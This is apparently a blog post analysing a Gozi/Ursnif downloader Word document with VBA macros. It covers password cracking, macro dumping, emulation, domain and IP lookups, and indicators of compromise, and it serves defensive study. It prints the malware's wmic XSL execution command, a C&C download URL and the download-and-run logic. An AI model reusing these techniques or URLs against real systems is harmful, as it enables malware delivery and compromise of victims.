Malware Analysis — Gozi/Ursnif Downloader
In the previous article, we looked at basic dynamic analysis of a NanoCore variant. In this article, we’ll be analyzing a VBA malware which I came across on the ANY.RUN platform.
Note: Ensure you have the malware sample placed in a safe environment (preferably, a malware analysis lab setup) before starting analysis.
Credits: A big shout out to Max ‘Libra’ Kersten who helped me format this article and understand the intel behind this malware. Do check out his Twitter and binary analysis course.
Hashes for the sample:
- MD5: ed7af781dd9f2b13c17da952da0742d3
- SHA256: ed75e995bab56b1de4e25e453de84e0726ead021426d6bcbacf8c62e7385114f
Unzip the sample using the default password, infected. The resultant ZIP file is also password protected. To crack the password, I used John The Ripper on Kali Linux. You can use your preferred tool.
root@malnet:~# /opt/JohnTheRipper/run/zip2john /root/malware/Ursnif/ursnif.zip > /root/malware/Ursnif/hash.txt
ver 2.0 ursnif.zip/info_08.22.doc PKZIP Encr: cmplen=50689, decmplen=101376, crc=2DCC1165root@malnet:~# /opt/JohnTheRipper/run/john --format=pkzip /root/malware/Ursnif/hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/opt/JohnTheRipper/run/password.lst, rules:Wordlist
777 (ursnif.zip/info_08.22.doc)
1g 0:00:00:00 DONE 2/3 (2019-09-08 17:56) 25.00g/s 1401Kp/s 1401Kc/s 1401KC/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password for the sample is 777.
root@malnet:~# unzip /root/malware/Ursnif/ursnif.zip
Archive: /root/malware/Ursnif/ursnif.zip
[/root/malware/Ursnif/ursnif.zip] info_08.22.doc password:
inflating: info_08.22.docHashes for info_08.22.doc:
- MD5: d4c7cadc810aeaf4397f1a1a245a35ea
- SHA256: f8c81e287393aadfc13905f46aab34edd55eed46a57ffa4dc74346e438495d4e
Dumping VBA Macros
I used officemalscanner to dump the VBA macros. On viewing the VBA code, I could see that strings were obfuscated.
High-Level Notes
The code contained many statements which were junk code. Consider the following snippet from the file, aYxCV:
The blocks of code enclosed in red is junk code, while relevant code is enclosed in green. In the sample, junk code is present in the following forms:
(Adding bookmarks)
With ActiveDocument.Bookmarks
.Add Range:=Selection.Range, Name:="_obfuscatedString_"
.ShowHidden = False
End With(Deleting bookmarks)
If ActiveDocument.Bookmarks.Exists("_obfuscatedString_") = True Then
ActiveDocument.Bookmarks("_obfuscatedString_").Delete
End If(Renaming bookmarks)
If ActiveDocument.Bookmarks.Exists("_obfuscatedString_") = True Then
ActiveDocument.Bookmarks("_obfuscatedString_").Select
Selection.TypeText Text:="_obfuscatedString_"
End If(Updating document)
_obfuscatedString_ = ActiveDocument.ActiveTheme
ActiveDocument.AcceptAllRevisionsShown
_obfuscatedString_ = ActiveDocument.ActiveThemeDisplayName
ActiveDocument.ActivateFor readability purposes, I’ve removed all junk code and comments from the code in screenshots from this point onward.
Drop axJBYm.xsl
Dynamic Method
To emulate the VBA code, I used the dev version of ViperMonkey. This was very helpful in this case because the sample dropped a file named, axJBYm.xsl.
root@malnet:~/malware/Ursnif# vmonkey info_08.22.doc
...
...
vmonkey 0.08 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: info_08.22.doc INFO
Starting emulation...
INFO Emulating an Office (VBA) file.
...
...
INFO Saving dropped analysis artifacts in info_08.22.doc_artifacts/ INFO Parsing VB...
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: - OLE stream: u'Macros/VBA/ThisDocument'
...
...
Recorded Actions:
+-------------------+---------------------------+---------------------------+
| Action | Parameters | Description |
+-------------------+---------------------------+---------------------------+
| Found Entry Point | document_open | |
| OPEN | axJBYm.xsl | Open File |
| Dropped File Hash | f17da1f0dbf6f32579e75b600 | File Name: axJBYm.xsl |
| | bfc6673fe04e4ccde57094feb | |
| | 1772387f153a1b | |
| run | ['c:\\Windows\\System32\\ | Interesting Function Call |
| | wbem\\wmic process list | |
| | /format:"axJBYm.xsl"', 0] | |
| Run | xsl" | Interesting Function Call |
| Found Entry Point | userform_initialize | |
+-------------------+---------------------------+---------------------------+
VBA Builtins Called: ['Bookmarks', 'Chr', 'Close', 'Len', 'Mid', 'TypeText', 'Val', 'run']Finished analyzing info_08.22.doc .root@malnet:~/malware/Ursnif/info_08.22.doc_artifacts# ls
axJBYm.xsl
Static Method
The content of axJBYm.xsl ( 3c3f78…) is embedded inside info_08.22.doc in hex form.
The highlighted statement (in screenshot below) in main() in attribute, afP7R reads the xsl content, converts the hex to ascii and writes to axJBYm.xsl on disk.
The function, aFTqlABJK() in attribute, acUTw9q converts its argument from its hex form to ASCII. The function a8q3wRJi() in attribute, acUTw9q writes to a file on disk.
Hashes for axJBYm.xsl:
- MD5: a8f0def13cb3fae52f6e06050513c2c8
- SHA256: f17da1f0dbf6f32579e75b600bfc6673fe04e4ccde57094feb1772387f153a1b
Execute Embedded Code in axJBYm.xsl
The sample constructs a cmdline command (highlighted in screenshot below) using aFTqlABJK() which is called from main() in attribute, afP7R:
After converting the hex form to ASCII, the cmdline command constructed is:
c:\Windows\System32\wbem\wmic process list /format:"axJBYm.xsl"The above command is then executed on the Windows shell via a WshShell object.
In other words, the malware author uses a legit Windows tool, to call JavaScript code that is embedded inside axJBYm.xsl.
Downloading Malware
axJBYm.xsl contained a lot of junk JavaScript code. Two such blocks are enclosed in red in the screenshot below:
I’ve removed the junk code from axJBYm.xsl for readability purposes.
The JavaScript code in axJBYm.xsl first called the function, a7DGra() with argument, 0.
The array consists of elements that modify themselves at runtime. After the modifications, the array auC9FNxgG contained:
[
"http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12",
"wscript.shell",
"scripting.filesystemobject",
"msxml2.xmlhttp",
"savetofile",
"run",
"deletefile",
"c:\\windows\\temp\\aChDfgl4.exe"
](First element in the array above is the C&C URL.)
The function, ay92Yiw() (in axJBYm.xsl) is called through a xsl tag in axJBYm.xsl:
ay92Yiw() contains calls to ActiveXObject() which is supported on Internet Explorer only. This implies that remote files are downloaded through IE.
The code creates an IXMLHttpRequest ActiveXObject object which provides HTTP communication capabilities. It sends a GET request to the C&C URL and waits until it receives a response (malware binary data). If a favorable response is received, the code creates a binary file at c:\windows\temp\aChDfgl4.exe, executes it and deletes axJBYm.xsl.
At the time of writing this article, the C&C URL was not reachable and no longer delivering malware.
Component of Gozi/Ursnif Campaign
Analysis from another security researcher, Jammy also suggests that the maldoc is part of an Gozi/Ursnif campaign. Another researcher, SomeInfoSecJerk also found a maldoc protected by password, 777 which dropped Gozi/Ursnif malware. Another similar sample that uses wmic to download an Gozi/Ursnif variant can be found here.
A Variant
Unlike the Ursnif downloader sample analyzed by Fortinet (which uses PowerShell commands), the sample that I’ve analyzed downloads the malware by executing JavaScript code embedded inside a xsl file.
Domain Information
According to VirusTotal (VT), as on 3rd September 2019, wlibby71e.com was being served by 185.174.172.98 (enclosed in green below).
According to Whois records, wlibby71e.com was registered on 22nd August 2019 by registrar, ERANET INTERNATIONAL LIMITED. According to this page, the said registrar was founded in 2000 and is based in China. The registrar’s contact phone has country code, +86 which belongs to China as well. The name servers are registered on the domain, dnspod.com and DNSPod is a DNS service provider based in China.
The above information suggests that this malware campaign may be orchestrated by a Chinese actor or someone who has made it look like a Chinese actor. However, there is no evidence to prove either case.
A Google search to find presence of the string, wlibby71e.com before August 22nd 2019 did not reveal anything substantial.
IP Information
185.174.172.98 is mapped to vps29604nl.hyperhost.name according to a reverse IP lookup on this page. The domain’s registrar is Center of Ukrainian Internet Names (UKRNAMES) which is based in Ukraine. Whois information for the said domain is available here.
The above information suggests that the C&C server (with domain, wlibby71e.com) was hosted on a Virtual Private Server (VPS). So, geo-locating the IP isn’t very useful.
STIX Feed
{
"type": "bundle",
"id": "bundle--e8b3e0c9-e43e-4aec-a2de-7ad5337040dc",
"spec_version": "2.0",
"objects": [
{"type": "malware",
"id": "malware--0999ea0c-a6f2-4c46-b2ee-3ea923848753",
"created": "2019-09-13T20:05:00.000Z",
"modified": "2019-09-14T00:16:20.696Z",
"name": "Gozi/Ursnif Downloader",
"description": "Downloads a Gozi/Ursnif variant from a remote URL when opened in MS Word with macros enabled.",
"labels": [ "dropper" ]
},
{
"type": "relationship",
"id": "relationship--4ad721d4-04d0-445d-a035-be35871f647d",
"created": "2019-09-14T00:16:20.712Z",
"modified": "2019-09-14T00:16:20.712Z",
"relationship_type": "indicates",
"source_ref": "indicator--23bbd32b-c98f-4a4a-b0ab-91aeabc7a58d",
"target_ref": "malware--0999ea0c-a6f2-4c46-b2ee-3ea923848753" },
{
"type": "indicator",
"id": "indicator--23bbd32b-c98f-4a4a-b0ab-91aeabc7a58d",
"created": "2019-09-13T20:05:00.000Z",
"modified": "2019-09-14T00:16:20.697Z",
"name": "Gozi/Ursnif Downloader",
"description": "This file hash indicates that a sample of Gozi/Ursnif Downloader is present.",
"pattern": "[file:hashes.'MD5' = 'd4c7cadc810aeaf4397f1a1a245a35ea'] AND [url:value = 'http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12']",
"valid_from": "2019-09-13T20:05:00Z",
"labels": [ "malicious-activity" ]
}
]
}Hashes
ursnif.zip.zip
- MD5: ed7af781dd9f2b13c17da952da0742d3
- SHA256: ed75e995bab56b1de4e25e453de84e0726ead021426d6bcbacf8c62e7385114f
info_08.22.doc
- MD5: d4c7cadc810aeaf4397f1a1a245a35ea
- SHA256: f8c81e287393aadfc13905f46aab34edd55eed46a57ffa4dc74346e438495d4e
axJBYm.xsl
- MD5: a8f0def13cb3fae52f6e06050513c2c8
- SHA256: f17da1f0dbf6f32579e75b600bfc6673fe04e4ccde57094feb1772387f153a1b
C&C
http://wlibby71e.com/qtra/ttqr.php?l=spxo9.j12Other URLs associated with this host are available here and in the screenshot below:
The malware sample is a .doc file which has VBA macros embedded in it. The malicious code is executed when a user enables macros when the sample is opened in MS Word. It drops a xsl file on disk and executes the embedded JavaScript through wmic. The xsl file downloads a malware binary (Gozi/Ursnif variant) from a remote C&C and executes it on the system.
In this article, I described my analysis for a VBA malware which downloads a Gozi/Ursnif variant. The VBA macros and the xsl file had lots of junk code, which I believe help the malware evade anti-virus software (untested hypothesis).
Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!
Feature image credits: https://coderacademy.edu.au/blog/coding-starters/what-does-malware-analysis-involve
P.S. I also write on my blog https://0x90sploiter.wordpress.com.
Originally published at http://0x90sploiter.wordpress.com on September 10, 2019.
